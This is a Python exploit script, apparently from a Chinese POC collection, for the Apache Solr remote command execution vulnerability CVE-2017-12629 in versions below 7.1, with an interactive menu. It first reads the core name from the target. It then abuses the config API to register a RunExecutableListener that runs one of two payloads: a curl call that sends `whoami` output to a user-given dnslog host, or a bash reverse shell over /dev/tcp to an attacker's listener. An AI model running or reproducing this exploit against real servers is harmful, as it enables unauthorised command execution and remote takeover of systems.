Apache Solr RCE 远程命令执行漏洞 CVE-2017-12629.py

3.89 KB / 2021-07-04 06:01:08
    #!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from   : http://wiki.peiqi.tech

import requests
import sys
import json
import random

def title():
    print('+------------------------------------------')
    print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')
    print('+  \033[34mGithub : https://github.com/PeiQi0                                 \033[0m')
    print('+  \033[34m公众号 : PeiQi文库                                                \033[0m')
    print('+  \033[34mVersion: Apache Solr < 7.1                                        \033[0m')
    print('+  \033[36m使用格式: python3 cve-2017-12629.py                                 \033[0m')
    print('+  \033[36mUrl    >>> http://xxx.xxx.xxx.xxx:8983                            \033[0m')
    print('+  \033[36mcmd    >>> dnslog地址(漏洞外连检测)                                  \033[0m')
    print('+  \033[36mCmd    >>> shell(反弹shell)                                        \033[0m')
    print('+------------------------------------------')

def POC_1(target_url):
    core_url = target_url + "/solr/admin/cores?indexInfo=false&wt=json"
    try:
        response = requests.request("GET", url=core_url, timeout=10)
        core_name = list(json.loads(response.text)["status"])[0]
        print("\033[32m[o] 成功获得core_name,Url为：" + target_url + "/solr/" + core_name + "/config\033[0m")
        return core_name
    except:
        print("\033[31m[x] 目标Url漏洞利用失败\033[0m")
        sys.exit(0)

def POC_2(target_url, core_name, dnslog_url, n):
    exp_url = target_url + "/solr/" + core_name + "/config"
    dnslog_url = "`whoami`." + dnslog_url
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
    }
    payload_cmd = """
    {"add-listener":{"event":"postCommit","name":"newSearche-%s","class":"solr.RunExecutableListener","exe":"curl","dir":"/usr/bin/","args":["%s"]}}
    """ % (n, dnslog_url)

    response = requests.request("POST", url=exp_url, headers=headers, data=payload_cmd, timeout=30)
    if "add-listener" not in response.text:
        print("\033[32m[o] 成功执行，请查看dnslog \033[0m")
    else:
        print("\033[31m[x] 漏洞利用失败 \033[0m")

def POC_3(target_url, core_name, n, ip, port):
    exp_url = target_url + "/solr/" + core_name + "/config"
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
    }
    payload_cmd = """
        {"add-listener":{"event":"postCommit","name":"newSearche-%s","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c","bash -i >& /dev/tcp/%s/%s 0>&1"]}}
        """ % (n, ip, port)

    response = requests.request("POST", url=exp_url, headers=headers, data=payload_cmd, timeout=30)
    if "add-listener" not in response.text:
        print("\033[32m[o] 成功执行 \033[0m")
    else:
        print("\033[31m[x] 漏洞利用失败 \033[0m")


if __name__ == '__main__':
    title()
    target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
    core_name = POC_1(target_url)

    while True:
        n = random.randint(1, 9999)
        cmd = input("\033[35mCmd >>> \033[0m")
        if cmd == "exit":
            exit(0)
        elif cmd == "shell":
            IP   = str(input("\033[35m请输入监听IP   >>> \033[0m"))
            PORT = str(input("\033[35m请输入监听PORT >>> \033[0m"))
            POC_3(target_url, core_name, n, IP, PORT)
        elif cmd == "dnslog":
            dnslog_url = str(input('\033[35m请输入你的dnslog地址：\033[0m'))
            POC_2(target_url, core_name, dnslog_url, n)